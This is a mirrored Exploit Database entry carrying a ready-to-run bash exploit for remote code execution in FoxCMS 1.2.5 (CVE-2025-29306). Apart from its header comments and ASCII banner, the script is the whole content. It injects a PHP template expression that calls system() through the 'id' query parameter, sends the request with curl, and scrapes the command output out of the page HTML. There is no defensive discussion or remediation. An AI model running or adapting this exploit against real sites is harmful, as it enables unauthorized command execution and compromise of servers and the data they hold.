FoxCMS 1.2.5 – Remote Code Execution (RCE)

• Exploit Database
• 8 阅读

• 作者： VeryLazyTech
  日期： 2025-04-19
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/52267/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64

  # Date: 2025-04-17 # Exploit Title: # Exploit Author: VeryLazyTech # Vendor Homepage: https://www.foxcms.org/ # Software Link: https://www.foxcms.cn/ # Version: FoxCMS v.1.2.5 # Tested on: Ubuntu 22.04, Windows Server 2019 # CVE: CVE-2025-29306 # Website: https://www.verylazytech.com   #!/bin/bash   banner() { cat <<&apos;EOF&apos; ______ _______ ____ ___ ____________ ___ ________ __ / ___\ \ / / ____| |___ \ / _ \___ \| ___||___ \ / _ \___ / / _ \ / /_ | |\ \ / /|_| __) | | | |__) |___ \__) | (_) ||_ \| | | | &apos;_ \ | |___\ V / | |___ / __/| |_| / __/ ___) |/ __/ \__, |__) | |_| | (_) | \____|\_/|_____| |_____|\___/_____|____/|_____|/_/____/ \___/ \___/   __ ________ _ \ \ / /__ _ __ _ _| |__ _ _____ _|_ _|_____| |__ \ \ / / _ \ &apos;__| | | | | | / _` |_/ | | | | |/ _ \/ __| &apos;_ \ \ V /__/ || |_| | | |__| (_| |/ /| |_| | | |__/ (__| | | | \_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_| |___/|___/     @VeryLazyTech - Medium   EOF   }   # Call the banner function banner   set -e   # Check for correct number of arguments if [ "$#" -ne 2 ]; then printf "Usage: $0 <url> <command>" exit 1 fi   TARGET=$1   # Encode payload ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote(&apos;\${@print_r(@system(\"$2\"))}&apos;))") FULL_URL="${TARGET}?id=${ENCODED_CMD}"   echo "[*] Sending RCE payload: $2" HTML=$(curl -s "$FULL_URL")   # Extract <ul> from known XPath location using xmllint UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null)   # Strip tags, clean up CLEANED=$(echo "$UL_CONTENT" | sed &apos;s/<[^>]*>//g&apos; | sed &apos;/^$/d&apos; | sed &apos;s/^[[:space:]]*//&apos;)   echo echo "[+] Command Output:" echo "$CLEANED"